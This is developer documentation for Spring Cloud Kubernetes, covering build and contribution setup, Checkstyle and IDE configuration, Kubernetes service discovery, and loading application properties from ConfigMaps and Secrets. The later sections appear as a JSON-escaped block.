This can be done by setting the standard Spring Kafka properties, for example:

====
[source,yaml]
----
spring:
  kafka:
    producer:
      bootstrap-servers: localhost:9092
----
====

== Examples

Spring Cloud Kubernetes tries to make it transparent for your applications to consume Kubernetes Native Services by
following the Spring Cloud interfaces.

In your applications, you need to add the `spring-cloud-kubernetes-discovery` dependency to your classpath and remove any other dependency that contains a `DiscoveryClient` implementation (that is, a Eureka discovery client).
The same applies for `PropertySourceLocator`, where you need to add to the classpath the `spring-cloud-kubernetes-config` and remove any other dependency that contains a `PropertySourceLocator` implementation (that is, a configuration server client).

The following projects highlight the usage of these dependencies and demonstrate how you can use these libraries from any Spring Boot application:

* https://github.com/spring-cloud/spring-cloud-kubernetes/tree/master/spring-cloud-kubernetes-examples[Spring Cloud Kubernetes Examples]: the ones located inside this repository.
* Spring Cloud Kubernetes Full Example: Minions and Boss
** https://github.com/salaboy/spring-cloud-k8s-minion[Minion]
** https://github.com/salaboy/spring-cloud-k8s-boss[Boss]
* Spring Cloud Kubernetes Full Example: https://github.com/salaboy/s1p_docs[SpringOne Platform Tickets Service]
* https://github.com/salaboy/s1p_gateway[Spring Cloud Gateway with Spring Cloud Kubernetes Discovery and Config]
* https://github.com/salaboy/showcase-admin-tool[Spring Boot Admin with Spring Cloud Kubernetes Discovery and Config]

== Other Resources

This section lists other resources, such as presentations (slides) and videos about Spring Cloud Kubernetes.

* https://salaboy.com/2018/09/27/the-s1p-experience/[S1P Spring Cloud on PKS]
* https://salaboy.com/2018/07/18/ljc-july-18-spring-cloud-docker-k8s/[Spring Cloud, Docker, Kubernetes -> London Java Community July 2018]

Please feel free to submit other resources through pull requests to https://github.com/spring-cloud/spring-cloud-kubernetes[this repository].

== Configuration properties

To see the list of all Kubernetes related configuration properties, please check link:appendix.html[the Appendix page].

== Building

:jdkversion: 1.7

=== Basic Compile and Test

To build the source, you will need to install JDK {jdkversion}.

Spring Cloud uses Maven for most build-related activities, and you
should be able to get off the ground quite quickly by cloning the
project you are interested in and typing:

----
$ ./mvnw install
----

NOTE: You can also install Maven (>=3.3.3) yourself and run the `mvn` command
in place of `./mvnw` in the examples below. If you do that, you also
might need to add `-P spring` if your local Maven settings do not
contain repository declarations for spring pre-release artifacts.

NOTE: Be aware that you might need to increase the amount of memory
available to Maven by setting a `MAVEN_OPTS` environment variable with
a value like `-Xmx512m -XX:MaxPermSize=128m`. We try to cover this in
the `.mvn` configuration, so if you find you have to do it to make a
build succeed, please raise a ticket to get the settings added to
source control.

For hints on how to build the project look in `.travis.yml` if there
is one. There should be a "script" and maybe "install" command.
Also
look at the "services" section to see if any services need to be
running locally (e.g. mongo or rabbit). Ignore the git-related bits
that you might find in "before_install", since they're related to setting git
credentials and you already have those.

The projects that require middleware generally include a
`docker-compose.yml`, so consider using
https://docs.docker.com/compose/[Docker Compose] to run the middleware servers
in Docker containers. See the README in the
https://github.com/spring-cloud-samples/scripts[scripts demo
repository] for specific instructions about the common cases of mongo,
rabbit and redis.

NOTE: If all else fails, build with the command from `.travis.yml` (usually
`./mvnw install`).

=== Documentation

The spring-cloud-build module has a "docs" profile, and if you switch
that on it will try to build asciidoc sources from
`src/main/asciidoc`. As part of that process it will look for a
`README.adoc` and process it by loading all the includes, but not
parsing or rendering it, just copying it to `${main.basedir}`
(defaults to `${basedir}`, i.e. the root of the project). If there are
any changes in the README it will then show up after a Maven build as
a modified file in the correct place. Just commit it and push the change.

=== Working with the code

If you don't have an IDE preference we would recommend that you use
https://www.springsource.com/developer/sts[Spring Tools Suite] or
https://eclipse.org[Eclipse] when working with the code. We use the
https://eclipse.org/m2e/[m2eclipse] eclipse plugin for maven support. Other IDEs and tools
should also work without issue as long as they use Maven 3.3.3 or better.

==== Activate the Spring Maven profile

Spring Cloud projects require the 'spring' Maven profile to be activated to resolve
the spring milestone and snapshot repositories. Use your preferred IDE to set this
profile to be active, or you may experience build errors.

==== Importing into eclipse with m2eclipse

We recommend the https://eclipse.org/m2e/[m2eclipse] eclipse plugin when working with
eclipse. If you don't already have m2eclipse installed it is available from the "eclipse
marketplace".

NOTE: Older versions of m2e do not support Maven 3.3, so once the
projects are imported into Eclipse you will also need to tell
m2eclipse to use the right profile for the projects. If you
see many different errors related to the POMs in the projects, check
that you have an up to date installation. If you can't upgrade m2e,
add the "spring" profile to your `settings.xml`. Alternatively you can
copy the repository settings from the "spring" profile of the parent
pom into your `settings.xml`.

==== Importing into eclipse without m2eclipse

If you prefer not to use m2eclipse you can generate eclipse project metadata using the
following command:

[indent=0]
----
	$ ./mvnw eclipse:eclipse
----

The generated eclipse projects can be imported by selecting `import existing projects`
from the `file` menu.

== Contributing

:spring-cloud-build-branch: master

Spring Cloud is released under the non-restrictive Apache 2.0 license,
and follows a very standard Github development process, using Github
tracker for issues and merging pull requests into master.
If you want
to contribute even something trivial, please do not hesitate, but
follow the guidelines below.

=== Sign the Contributor License Agreement

Before we accept a non-trivial patch or pull request we will need you to sign the
https://cla.pivotal.io/sign/spring[Contributor License Agreement].
Signing the contributor's agreement does not grant anyone commit rights to the main
repository, but it does mean that we can accept your contributions, and you will get an
author credit if we do. Active contributors might be asked to join the core team, and
given the ability to merge pull requests.

=== Code of Conduct

This project adheres to the Contributor Covenant https://github.com/spring-cloud/spring-cloud-build/blob/master/docs/src/main/asciidoc/code-of-conduct.adoc[code of
conduct]. By participating, you are expected to uphold this code. Please report
unacceptable behavior to spring-code-of-conduct@pivotal.io.

=== Code Conventions and Housekeeping

None of these is essential for a pull request, but they will all help. They can also be
added after the original pull request but before a merge.

* Use the Spring Framework code format conventions. If you use Eclipse
  you can import formatter settings using the
  `eclipse-code-formatter.xml` file from the
  https://raw.githubusercontent.com/spring-cloud/spring-cloud-build/master/spring-cloud-dependencies-parent/eclipse-code-formatter.xml[Spring
  Cloud Build] project. If using IntelliJ, you can use the
  https://plugins.jetbrains.com/plugin/6546[Eclipse Code Formatter
  Plugin] to import the same file.
* Make sure all new `.java` files have a simple Javadoc class comment with at least an
  `@author` tag identifying you, and preferably at least a paragraph on what the class is
  for.
* Add the ASF license header comment to all new `.java` files (copy from existing files
  in the project).
* Add yourself as an `@author` to the `.java` files that you modify substantially (more
  than cosmetic changes).
* Add some Javadocs and, if you change the namespace, some XSD doc elements.
* A few unit tests would help a lot as well -- someone has to do it.
* If no-one else is using your branch, please rebase it against the current master (or
  other target branch in the main project).
* When writing a commit message please follow https://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html[these conventions];
  if you are fixing an existing issue, please add `Fixes gh-XXXX` at the end of the commit
  message (where XXXX is the issue number).

=== Checkstyle

Spring Cloud Build comes with a set of checkstyle rules. You can find them in the `spring-cloud-build-tools` module. The most notable files under the module are:

.spring-cloud-build-tools/
----
└── src
    ├── checkstyle
    │   └── checkstyle-suppressions.xml <3>
    └── main
        └── resources
            ├── checkstyle-header.txt <2>
            └── checkstyle.xml <1>
----
<1> Default Checkstyle rules
<2> File header setup
<3> Default suppression rules

==== Checkstyle configuration

Checkstyle rules are *disabled by default*.
To add checkstyle to your project, just define the following properties and plugins.

.pom.xml
----
<properties>
	<maven-checkstyle-plugin.failsOnError>true</maven-checkstyle-plugin.failsOnError> <1>
	<maven-checkstyle-plugin.failsOnViolation>true
	</maven-checkstyle-plugin.failsOnViolation> <2>
	<maven-checkstyle-plugin.includeTestSourceDirectory>true
	</maven-checkstyle-plugin.includeTestSourceDirectory> <3>
</properties>

<build>
	<plugins>
		<plugin> <4>
			<groupId>io.spring.javaformat</groupId>
			<artifactId>spring-javaformat-maven-plugin</artifactId>
		</plugin>
		<plugin> <5>
			<groupId>org.apache.maven.plugins</groupId>
			<artifactId>maven-checkstyle-plugin</artifactId>
		</plugin>
	</plugins>
</build>

<reporting>
	<plugins>
		<plugin> <5>
			<groupId>org.apache.maven.plugins</groupId>
			<artifactId>maven-checkstyle-plugin</artifactId>
		</plugin>
	</plugins>
</reporting>
----
<1> Fails the build upon Checkstyle errors
<2> Fails the build upon Checkstyle violations
<3> Checkstyle also analyzes the test sources
<4> Add the Spring Java Format plugin, which reformats your code to pass most of the Checkstyle formatting rules
<5> Add the checkstyle plugin to your build and reporting phases

If you need to suppress some rules (e.g. line length needs to be longer), then it's enough for you to define a file under `${project.root}/src/checkstyle/checkstyle-suppressions.xml` with your suppressions. Example:

.projectRoot/src/checkstyle/checkstyle-suppressions.xml
----
<?xml version="1.0"?>
<!DOCTYPE suppressions PUBLIC
		"-//Puppy Crawl//DTD Suppressions 1.1//EN"
		"https://www.puppycrawl.com/dtds/suppressions_1_1.dtd">
<suppressions>
	<suppress files=".*ConfigServerApplication\.java" checks="HideUtilityClassConstructor"/>
	<suppress files=".*ConfigClientWatch\.java" checks="LineLengthCheck"/>
</suppressions>
----

It's advisable to copy the `${spring-cloud-build.rootFolder}/.editorconfig` and `${spring-cloud-build.rootFolder}/.springformat` to your project. That way, some default formatting rules will be applied.
You can do so by running this script:

```bash
$ curl https://raw.githubusercontent.com/spring-cloud/spring-cloud-build/master/.editorconfig -o .editorconfig
$ touch .springformat
```

=== IDE setup

==== Intellij IDEA

In order to set up Intellij, you should import our coding conventions and inspection profiles, and set up the checkstyle plugin.
The following files can be found in the https://github.com/spring-cloud/spring-cloud-build/tree/master/spring-cloud-build-tools[Spring Cloud Build] project.

.spring-cloud-build-tools/
----
└── src
    ├── checkstyle
    │   └── checkstyle-suppressions.xml <3>
    └── main
        └── resources
            ├── checkstyle-header.txt <2>
            ├── checkstyle.xml <1>
            └── intellij
                ├── Intellij_Project_Defaults.xml <4>
                └── Intellij_Spring_Boot_Java_Conventions.xml <5>
----
<1> Default Checkstyle rules
<2> File header setup
<3> Default suppression rules
<4> Project defaults for Intellij that apply most of the Checkstyle rules
<5> Project style conventions for Intellij that apply most of the Checkstyle rules

.Code style

image::https://raw.githubusercontent.com/spring-cloud/spring-cloud-build/{spring-cloud-build-branch}/docs/src/main/asciidoc/images/intellij-code-style.png[Code style]

Go to `File` -> `Settings` -> `Editor` -> `Code style`. There click on the icon next to the `Scheme` section. There, click on the `Import Scheme` value and pick the `Intellij IDEA code style XML` option. Import the `spring-cloud-build-tools/src/main/resources/intellij/Intellij_Spring_Boot_Java_Conventions.xml` file.

.Inspection profiles

image::https://raw.githubusercontent.com/spring-cloud/spring-cloud-build/{spring-cloud-build-branch}/docs/src/main/asciidoc/images/intellij-inspections.png[Inspection profiles]

Go to `File` -> `Settings` -> `Editor` -> `Inspections`. There click on the icon next to the `Profile` section. There, click on `Import Profile` and import the `spring-cloud-build-tools/src/main/resources/intellij/Intellij_Project_Defaults.xml` file.

.Checkstyle

To have Intellij work with Checkstyle, you have to install the `Checkstyle` plugin. It's advisable to also install the `Assertions2Assertj` plugin to automatically convert the JUnit assertions.

image::https://raw.githubusercontent.com/spring-cloud/spring-cloud-build/{spring-cloud-build-branch}/docs/src/main/asciidoc/images/intellij-checkstyle.png[Checkstyle]

Go to `File` -> `Settings` -> `Other settings` -> `Checkstyle`. There click on the `+` icon in the `Configuration file` section. There, you'll have to define where the checkstyle rules should be picked from. In the image above, we've picked the rules from the cloned Spring Cloud Build repository. However, you can point to the Spring Cloud Build's GitHub repository (e.g. for the `checkstyle.xml`: `https://raw.githubusercontent.com/spring-cloud/spring-cloud-build/master/spring-cloud-build-tools/src/main/resources/checkstyle.xml`).
We need to provide the following variables:

- `checkstyle.header.file` - please point it to the Spring Cloud Build's `spring-cloud-build-tools/src/main/resources/checkstyle-header.txt` file, either in your cloned repo or via the `https://raw.githubusercontent.com/spring-cloud/spring-cloud-build/master/spring-cloud-build-tools/src/main/resources/checkstyle-header.txt` URL.
- `checkstyle.suppressions.file` - default suppressions. Please point it to the Spring Cloud Build's `spring-cloud-build-tools/src/checkstyle/checkstyle-suppressions.xml` file, either in your cloned repo or via the `https://raw.githubusercontent.com/spring-cloud/spring-cloud-build/master/spring-cloud-build-tools/src/checkstyle/checkstyle-suppressions.xml` URL.
- `checkstyle.additional.suppressions.file` - this variable corresponds to suppressions in your local project. E.g. if you're working on `spring-cloud-contract`, point to the `project-root/src/checkstyle/checkstyle-suppressions.xml` file. An example for `spring-cloud-contract` would be: `/home/username/spring-cloud-contract/src/checkstyle/checkstyle-suppressions.xml`.

IMPORTANT: Remember to set the `Scan Scope` to `All sources` since we apply checkstyle rules for production and test sources.
Include a starter to get the dependencies and Spring Boot\nauto-configuration for a feature set.\n\n[cols=\"a,d\"]\n|===\n| Starter | Features\n\n| [source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes<\/artifactId>\n<\/dependency>\n----\n| <<DiscoveryClient for Kubernetes,Discovery Client>> implementation that\nresolves service names to Kubernetes Services.\n\n| [source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-config<\/artifactId>\n<\/dependency>\n----\n| Load application properties from Kubernetes\n<<configmap-propertysource,ConfigMaps>> and <<Secrets PropertySource,Secrets>>.\n<<propertysource-reload,Reload>> application properties when a ConfigMap or\nSecret changes.\n\n| [source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-all<\/artifactId>\n<\/dependency>\n----\n| All Spring Cloud Kubernetes features.\n\n|===\n\n== DiscoveryClient for Kubernetes\n\nThis project provides an implementation of https:\/\/github.com\/spring-cloud\/spring-cloud-commons\/blob\/master\/spring-cloud-commons\/src\/main\/java\/org\/springframework\/cloud\/client\/discovery\/DiscoveryClient.java[Discovery Client]\nfor https:\/\/kubernetes.io[Kubernetes].\nThis client lets you query Kubernetes endpoints (see https:\/\/kubernetes.io\/docs\/user-guide\/services\/[services]) by name.\nA service is typically exposed by the Kubernetes API server as a collection of endpoints that represent `http` and `https` addresses and that a client can\naccess from a Spring Boot application running as a pod.\n\nThis is something that you get for free by adding the following dependency inside your project:\n\n====\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes<\/artifactId>\n<\/dependency>\n----\n====\n\nTo enable loading of the `DiscoveryClient`, add `@EnableDiscoveryClient` to the according configuration or application class, as the following example shows:\n\n====\n[source,java]\n----\n@SpringBootApplication\n@EnableDiscoveryClient\npublic class Application {\n public static void main(String[] args) {\n SpringApplication.run(Application.class, args);\n }\n}\n----\n====\n\nThen you can inject the client in your code simply by autowiring it, as the following example shows:\n\n====\n[source,java]\n----\n@Autowired\nprivate DiscoveryClient discoveryClient;\n----\n====\n\nYou can choose to enable `DiscoveryClient` from all namespaces by setting the following property in `application.properties`:\n\n====\n[source]\n----\nspring.cloud.kubernetes.discovery.all-namespaces=true\n----\n====\n\nIf, for any reason, you need to disable the `DiscoveryClient`, you can set the following property in `application.properties`:\n\n====\n[source]\n----\nspring.cloud.kubernetes.discovery.enabled=false\n----\n====\n\nSome Spring Cloud components use the `DiscoveryClient` in order to obtain information about the local service instance. For\nthis to work, you need to align the Kubernetes service name with the `spring.application.name` property.\n\nNOTE: `spring.application.name` has no effect as far as the name registered for the application within Kubernetes\n\nSpring Cloud Kubernetes can also watch the Kubernetes service catalog for changes and update the\n`DiscoveryClient` implementation accordingly. 
In order to enable this functionality you need to add\n`@EnableScheduling` on a configuration class in your application.\n\n== Kubernetes native service discovery\n\nKubernetes itself is capable of (server side) service discovery (see: https:\/\/kubernetes.io\/docs\/concepts\/services-networking\/service\/#discovering-services).\nUsing native kubernetes service discovery ensures compatibility with additional tooling, such as Istio (https:\/\/istio.io), a service mesh that is capable of load balancing, circuit breaker, failover, and much more.\n\nThe caller service then need only refer to names resolvable in a particular Kubernetes cluster. A simple implementation might use a spring `RestTemplate` that refers to a fully qualified domain name (FQDN), such as `https:\/\/{service-name}.{namespace}.svc.{cluster}.local:{service-port}`.\n\nAdditionally, you can use Hystrix for:\n\n* Circuit breaker implementation on the caller side, by annotating the spring boot application class with `@EnableCircuitBreaker`\n* Fallback functionality, by annotating the respective method with `@HystrixCommand(fallbackMethod=`\n\n== Kubernetes PropertySource implementations\n\nThe most common approach to configuring your Spring Boot application is to create an `application.properties` or `application.yaml` or\nan `application-profile.properties` or `application-profile.yaml` file that contains key-value pairs that provide customization values to your\napplication or Spring Boot starters. You can override these properties by specifying system properties or environment\nvariables.\n\n[[configmap-propertysource]]\n=== Using a `ConfigMap` `PropertySource`\n\nKubernetes provides a resource named https:\/\/kubernetes.io\/docs\/user-guide\/configmap\/[`ConfigMap`] to externalize the\nparameters to pass to your application in the form of key-value pairs or embedded `application.properties` or `application.yaml` files.\nThe link:.\/spring-cloud-kubernetes-config[Spring Cloud Kubernetes Config] project makes Kubernetes `ConfigMap` instances available\nduring application bootstrapping and triggers hot reloading of beans or Spring context when changes are detected on\nobserved `ConfigMap` instances.\n\nThe default behavior is to create a `Fabric8ConfigMapPropertySource` based on a Kubernetes `ConfigMap` that has a `metadata.name` value of either the name of\nyour Spring application (as defined by its `spring.application.name` property) or a custom name defined within the\n`bootstrap.properties` file under the following key: `spring.cloud.kubernetes.config.name`.\n\nHowever, more advanced configuration is possible where you can use multiple `ConfigMap` instances.\nThe `spring.cloud.kubernetes.config.sources` list makes this possible.\nFor example, you could define the following `ConfigMap` instances:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: cloud-k8s-app\n cloud:\n kubernetes:\n config:\n name: default-name\n namespace: default-namespace\n sources:\n # Spring Cloud Kubernetes looks up a ConfigMap named c1 in namespace default-namespace\n - name: c1\n # Spring Cloud Kubernetes looks up a ConfigMap named default-name in whatever namespace n2\n - namespace: n2\n # Spring Cloud Kubernetes looks up a ConfigMap named c3 in namespace n3\n - namespace: n3\n name: c3\n----\n====\n\nIn the preceding example, if `spring.cloud.kubernetes.config.namespace` had not been set,\nthe `ConfigMap` named `c1` would be looked up in the namespace that the application runs.\n\nAny matching `ConfigMap` that is found is processed as 
follows:\n\n* Apply individual configuration properties.\n* Apply as `yaml` the content of any property named `application.yaml`.\n* Apply as a properties file the content of any property named `application.properties`.\n\nThe single exception to the aforementioned flow is when the `ConfigMap` contains a *single* key that indicates\nthe file is a YAML or properties file. In that case, the name of the key does NOT have to be `application.yaml` or\n`application.properties` (it can be anything) and the value of the property is treated correctly.\nThis feature facilitates the use case where the `ConfigMap` was created by using something like the following:\n\n====\n[source]\n----\nkubectl create configmap game-config --from-file=\/path\/to\/app-config.yaml\n----\n====\n\nAssume that we have a Spring Boot application named `demo` that uses the following properties to read its thread pool\nconfiguration.\n\n* `pool.size.core`\n* `pool.size.maximum`\n\nThis can be externalized to a config map in `yaml` format as follows:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n  name: demo\ndata:\n  pool.size.core: 1\n  pool.size.maximum: 16\n----\n====\n\nIndividual properties work fine for most cases. However, sometimes, embedded `yaml` is more convenient. In this case, we\nuse a single property named `application.yaml` to embed our `yaml`, as follows:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n  name: demo\ndata:\n  application.yaml: |-\n    pool:\n      size:\n        core: 1\n        maximum: 16\n----\n====\n\nThe following example also works:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n  name: demo\ndata:\n  custom-name.yaml: |-\n    pool:\n      size:\n        core: 1\n        maximum: 16\n----\n====\n\nYou can also configure Spring Boot applications differently depending on active profiles that are merged together\nwhen the `ConfigMap` is read. 
You can provide different property values for different profiles by using an\n`application.properties` or `application.yaml` property, specifying profile-specific values, each in their own document\n(indicated by the `---` sequence), as follows:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n  name: demo\ndata:\n  application.yml: |-\n    greeting:\n      message: Say Hello to the World\n    farewell:\n      message: Say Goodbye\n    ---\n    spring:\n      profiles: development\n    greeting:\n      message: Say Hello to the Developers\n    farewell:\n      message: Say Goodbye to the Developers\n    ---\n    spring:\n      profiles: production\n    greeting:\n      message: Say Hello to the Ops\n----\n====\n\nIn the preceding case, the configuration loaded into your Spring Application with the `development` profile is as follows:\n\n====\n[source,yaml]\n----\ngreeting:\n  message: Say Hello to the Developers\nfarewell:\n  message: Say Goodbye to the Developers\n----\n====\n\nHowever, if the `production` profile is active, the configuration becomes:\n\n====\n[source,yaml]\n----\ngreeting:\n  message: Say Hello to the Ops\nfarewell:\n  message: Say Goodbye\n----\n====\n\nIf both profiles are active, the property that appears last within the `ConfigMap` overwrites any preceding values.\n\nAnother option is to create a different config map per profile, and Spring Boot automatically fetches the right one based\non the active profiles:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n  name: demo\ndata:\n  application.yml: |-\n    greeting:\n      message: Say Hello to the World\n    farewell:\n      message: Say Goodbye\n----\n====\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n  name: demo-development\ndata:\n  application.yml: |-\n    spring:\n      profiles: development\n    greeting:\n      message: Say Hello to the Developers\n    farewell:\n      message: Say Goodbye to the Developers\n----\n====\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n  name: demo-production\ndata:\n  application.yml: |-\n    spring:\n      profiles: production\n    greeting:\n      message: Say Hello to the Ops\n    farewell:\n      message: Say Goodbye\n----\n====\n\n\nTo tell Spring Boot which `profile` should be enabled at bootstrap, you can pass the `SPRING_PROFILES_ACTIVE` environment variable.\nTo do so, you can define it in the PodSpec at the container specification of your Deployment resource file, as follows:\n\n====\n[source,yaml]\n----\napiVersion: apps\/v1\nkind: Deployment\nmetadata:\n  name: deployment-name\n  labels:\n    app: deployment-name\nspec:\n  replicas: 1\n  selector:\n    matchLabels:\n      app: deployment-name\n  template:\n    metadata:\n      labels:\n        app: deployment-name\n    spec:\n      containers:\n      - name: container-name\n        image: your-image\n        env:\n        - name: SPRING_PROFILES_ACTIVE\n          value: \"development\"\n----\n====\n\nNOTE: You should check the security configuration section. To access config maps from inside a pod you need to have the correct\nKubernetes service accounts, roles and role bindings.\n\nAnother option for using `ConfigMap` instances is to mount them into the Pod by running the Spring Cloud Kubernetes application\nand having Spring Cloud Kubernetes read them from the file system.\nThis behavior is controlled by the `spring.cloud.kubernetes.config.paths` property. 
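For illustration only (the `ConfigMap` name `demo` and the mount path `\/config` are hypothetical), a pod might mount the config map as a volume and point the property at the mounted file:\n\n====\n[source,yaml]\n----\nspec:\n  containers:\n  - name: demo\n    image: your-image\n    volumeMounts:\n    - name: demo-config\n      mountPath: \/config\n  volumes:\n  - name: demo-config\n    configMap:\n      name: demo\n----\n====\n\nwith `spring.cloud.kubernetes.config.paths=\/config\/application.properties` set in `bootstrap.properties`. 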
You can use it in\naddition to or instead of the mechanism described earlier.\nYou can specify multiple (exact) file paths in `spring.cloud.kubernetes.config.paths` by using the `,` delimiter.\n\nNOTE: You have to provide the full exact path to each property file, because directories are not recursively parsed.\n\nNOTE: If you use `spring.cloud.kubernetes.config.paths` or `spring.cloud.kubernetes.secrets.path` the automatic reload\nfunctionality will not work. You will need to make a `POST` request to the `\/actuator\/refresh` endpoint or\nrestart\/redeploy the application.\n\n.Properties:\n[options=\"header,footer\"]\n|===\n| Name | Type | Default | Description\n| `spring.cloud.kubernetes.config.enabled` | `Boolean` | `true` | Enable ConfigMaps `PropertySource`\n| `spring.cloud.kubernetes.config.name` | `String` | `${spring.application.name}` | Sets the name of `ConfigMap` to look up\n| `spring.cloud.kubernetes.config.namespace` | `String` | Client namespace | Sets the Kubernetes namespace where to look up\n| `spring.cloud.kubernetes.config.paths` | `List` | `null` | Sets the paths where `ConfigMap` instances are mounted\n| `spring.cloud.kubernetes.config.enableApi` | `Boolean` | `true` | Enable or disable consuming `ConfigMap` instances through APIs\n|===\n\n=== Secrets PropertySource\n\nKubernetes has the notion of https:\/\/kubernetes.io\/docs\/concepts\/configuration\/secret\/[Secrets] for storing\nsensitive data such as passwords, OAuth tokens, and so on. This project provides integration with `Secrets` to make secrets\naccessible by Spring Boot applications. You can explicitly enable or disable this feature by setting the `spring.cloud.kubernetes.secrets.enabled` property.\n\nWhen enabled, the `Fabric8SecretsPropertySource` looks up `Secrets` in Kubernetes from the following sources:\n\n. Reading recursively from secrets mounts\n. Named after the application (as defined by `spring.application.name`)\n. Matching some labels\n\n*Note:*\n\nBy default, consuming Secrets through the API (points 2 and 3 above) *is not enabled* for security reasons. The permission 'list' on secrets allows clients to inspect secrets values in the specified namespace.\nFurther, we recommend that containers share secrets through mounted volumes.\n\nIf you enable consuming Secrets through the API, we recommend that you limit access to Secrets by using an authorization policy, such as RBAC.\nFor more information about risks and best practices when consuming Secrets through the API, refer to https:\/\/kubernetes.io\/docs\/concepts\/configuration\/secret\/#best-practices[this doc].\n\nIf the secrets are found, their data is made available to the application.\n\nAssume that we have a Spring Boot application named `demo` that uses properties to read its database\nconfiguration. 
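As a sketch (the property keys `db.username` and `db.password` are assumptions made for this example, not something the project mandates), the application might bind them as follows:\n\n====\n[source,java]\n----\n@Configuration\npublic class DbConfig {\n\n  \/\/ Spring Boot's relaxed environment binding also resolves these placeholders\n  \/\/ from the DB_USERNAME and DB_PASSWORD environment variables exported below.\n  @Value(\"${db.username}\")\n  private String username;\n\n  @Value(\"${db.password}\")\n  private String password;\n\n  \/\/ getters omitted\n}\n----\n====\n\n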
We can create a Kubernetes secret by using the following command:\n\n====\n[source]\n----\nkubectl create secret generic db-secret --from-literal=username=user --from-literal=password=p455w0rd\n----\n====\n\nThe preceding command would create the following secret (which you can see by using `kubectl get secrets db-secret -o yaml`):\n\n====\n[source,yaml]\n----\napiVersion: v1\ndata:\n  password: cDQ1NXcwcmQ=\n  username: dXNlcg==\nkind: Secret\nmetadata:\n  creationTimestamp: 2017-07-04T09:15:57Z\n  name: db-secret\n  namespace: default\n  resourceVersion: \"357496\"\n  selfLink: \/api\/v1\/namespaces\/default\/secrets\/db-secret\n  uid: 63c89263-6099-11e7-b3da-76d6186905a8\ntype: Opaque\n----\n====\n\nNote that the data contains Base64-encoded versions of the literals provided by the `create` command.\n\nYour application can then use this secret -- for example, by exporting the secret's value as environment variables:\n\n====\n[source,yaml]\n----\napiVersion: apps\/v1\nkind: Deployment\nmetadata:\n  name: ${project.artifactId}\nspec:\n  template:\n    spec:\n      containers:\n      - env:\n        - name: DB_USERNAME\n          valueFrom:\n            secretKeyRef:\n              name: db-secret\n              key: username\n        - name: DB_PASSWORD\n          valueFrom:\n            secretKeyRef:\n              name: db-secret\n              key: password\n----\n====\n\nYou can select the Secrets to consume in a number of ways:\n\n. By listing the directories where secrets are mapped:\n+\n====\n[source,bash]\n----\n-Dspring.cloud.kubernetes.secrets.paths=\/etc\/secrets\/db-secret,\/etc\/secrets\/postgresql\n----\n====\n+\nIf you have all the secrets mapped to a common root, you can set them as follows:\n+\n====\n[source,bash]\n----\n-Dspring.cloud.kubernetes.secrets.paths=\/etc\/secrets\n----\n====\n\n. By setting a named secret:\n+\n====\n[source,bash]\n----\n-Dspring.cloud.kubernetes.secrets.name=db-secret\n----\n====\n\n. By defining a list of labels:\n+\n====\n[source,bash]\n----\n-Dspring.cloud.kubernetes.secrets.labels.broker=activemq\n-Dspring.cloud.kubernetes.secrets.labels.db=postgresql\n----\n====\n\nAs is the case with `ConfigMap`, more advanced configuration is also possible where you can use multiple `Secret`\ninstances. 
The `spring.cloud.kubernetes.secrets.sources` list makes this possible.\nFor example, you could define the following `Secret` instances:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: cloud-k8s-app\n cloud:\n kubernetes:\n secrets:\n name: default-name\n namespace: default-namespace\n sources:\n # Spring Cloud Kubernetes looks up a Secret named s1 in namespace default-namespace\n - name: s1\n # Spring Cloud Kubernetes looks up a Secret named default-name in whatever namespace n2\n - namespace: n2\n # Spring Cloud Kubernetes looks up a Secret named s3 in namespace n3\n - namespace: n3\n name: s3\n----\n====\n\nIn the preceding example, if `spring.cloud.kubernetes.secrets.namespace` had not been set,\nthe `Secret` named `s1` would be looked up in the namespace that the application runs.\n\n\n.Properties:\n[options=\"header,footer\"]\n|===\n| Name | Type | Default | Description\n| `spring.cloud.kubernetes.secrets.enabled` | `Boolean` | `true` | Enable Secrets `PropertySource`\n| `spring.cloud.kubernetes.secrets.name` | `String` | `${spring.application.name}` | Sets the name of the secret to look up\n| `spring.cloud.kubernetes.secrets.namespace` | `String` | Client namespace | Sets the Kubernetes namespace where to look up\n| `spring.cloud.kubernetes.secrets.labels` | `Map` | `null` | Sets the labels used to lookup secrets\n| `spring.cloud.kubernetes.secrets.paths` | `List` | `null` | Sets the paths where secrets are mounted (example 1)\n| `spring.cloud.kubernetes.secrets.enableApi` | `Boolean` | `false` | Enables or disables consuming secrets through APIs (examples 2 and 3)\n|===\n\nNotes:\n\n* The `spring.cloud.kubernetes.secrets.labels` property behaves as defined by\nhttps:\/\/github.com\/spring-projects\/spring-boot\/wiki\/Spring-Boot-Configuration-Binding#map-based-binding[Map-based binding].\n* The `spring.cloud.kubernetes.secrets.paths` property behaves as defined by\nhttps:\/\/github.com\/spring-projects\/spring-boot\/wiki\/Spring-Boot-Configuration-Binding#collection-based-binding[Collection-based binding].\n* Access to secrets through the API may be restricted for security reasons. The preferred way is to mount secrets to the Pod.\n\nYou can find an example of an application that uses secrets (though it has not been updated to use the new `spring-cloud-kubernetes` project) at\nhttps:\/\/github.com\/fabric8-quickstarts\/spring-boot-camel-config[spring-boot-camel-config]\n\n=== `PropertySource` Reload\n\nWARNING: This functionality has been deprecated in the 2020.0 release. Please see\nthe <<spring-cloud-kubernetes-configuration-watcher>> controller for an alternative way\nto achieve the same functionality.\n\nSome applications may need to detect changes on external property sources and update their internal status to reflect the new configuration.\nThe reload feature of Spring Cloud Kubernetes is able to trigger an application reload when a related `ConfigMap` or\n`Secret` 